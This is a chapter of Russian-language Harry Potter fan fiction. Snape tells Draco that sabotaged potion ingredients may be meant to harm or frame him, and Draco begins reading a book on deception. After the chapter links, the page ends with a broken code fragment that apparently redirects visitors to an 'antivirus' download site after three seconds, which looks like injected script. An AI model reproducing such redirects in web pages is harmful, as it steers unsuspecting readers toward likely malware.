- Они догадываются, кто мы, - объяснил Северус. – Но поскольку ваша семья так любит привлекать внимание…

- Ничего подобного! – возразил юноша.

- Взорвать все имение – это, по-твоему, было очень скрытно? – усмехнулся Мастер зелий. – Ты такой же, как твой отец. Если Малфой ввязывается в неприятности, то они всегда грандиозны. Я вообще удивляюсь, что Люциусу так долго удавалось скрывать, кто он такой. Деньги, конечно, могут купить молчание и заставить людей смотреть в другую сторону, но судя по тому, как вы двое себя ведете, вам придется платить всем за то, чтобы они притворялись слепыми!

Драко множество раз слышал, как отец с Северусом спорят об этом, так что он закрыл рот и позволил крестному выпустить пар. Оказавшись в гостиной, он пересадил Илмаузера на спинку кресла и кивком указал на коробку:

- Сегодня утром Поттер принес мне от Хагрида двух мертвых гидр.

- Я видел, - кивнул Мастер зелий. – Разделаем их завтра утром. Никуда не выходи. Я знаю, что ты ничего не ел сегодня и распоряжусь прислать тебе ужин прямо сюда.

Не выходить? Драко встревожено поглядел на крестного.

- Я… я же не натворил ничего плохого, верно? Я знаю, что не должен был вот так убегать в лес, но…

- Дело не в этом, - покачал головой Северус и остановился возле камина. Он постарался очень осторожно подобрать слова. – Сегодня я проверил кладовую Слагхорна. Испорчены очень немногие ингредиенты, предназначенные только для тех занятий, где должен был присутствовать ты.

Драко понадобилось несколько секунд, чтобы понять.

- Ты думаешь, на меня кто-то охотится… или хочет подставить?

- Темного лорда устроит любой вариант, - ответил Северус. – Если бы произошло что-то еще, и ты бы выжил, тебя легко можно было бы обвинить. Слухи уже против тебя, Драко, особенно за пределами Хогвартса.

Юноша рухнул в ближайшее кресло и уронил голову на руки.

- И любое происшествие на Зельях позволит хорошим, светлым волшебникам ворваться в Хогвартс и потребовать мою голову.

- Именно, - Мастер зелий строго посмотрел на крестника. – Поэтому в будущем постарайся не сбегать от своих сопровождающих. Они, по крайней мере, смогут подтвердить, что ты ни в чем не виноват.

- Хорошо, - пробормотал Драко.

Северус ушел, но юноша не сдвинулся с места до тех пор, пока несколько минут спустя на столе не появился поднос с его ужином. Еда показалась ему совершенно безвкусной и, отложив вилку, он подвинул поднос ближе к Илмаузеру, чтобы тот перекусил.

Библиотечная книга, которую он принес утром - «Обман болотных огоньков» - так и лежала на столе. Драко взял ее, улегся на длинный диван возле камина, опершись на локти, и открыл  на первой странице. Чуть погодя, начав зябнуть, он накинул мантию.

«Часть первая.

Чтобы успешно хитрить и не поддаваться на уловки других, необходимо как следует понять саму суть обмана, процветающего как в природе, так и в обществе. Как и волшебные уловки - вроде отдаленного мерцания болотных огоньков - природные хитрости опираются на неспособность жертвы обнаружить, что происходящее – всего лишь иллюзия. Если она хотя бы заподозрит нечто подобное, то найти необходимые доказательства не составит труда и иллюзия потеряет силу. Малейшая ошибка может уничтожить всю задумку.

Огонек должен появляться на таком расстоянии, чтобы его можно было принять за фонарь, но не настолько близко, чтобы выдать свою колдовскую природу.

Подобным же образом обманные заклинания должны осторожно балансировать между тем, чтобы скрывать правду слишком хорошо, и не раскрывать свою собственную сущность.

Но настоящее мошенничество намного превосходит простой обман. Когда для сокрытия истины используются и хитрости природы, и разум, тогда правду можно исказить так незаметно, что обнаружить это можно только в особых обстоятельствах».

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>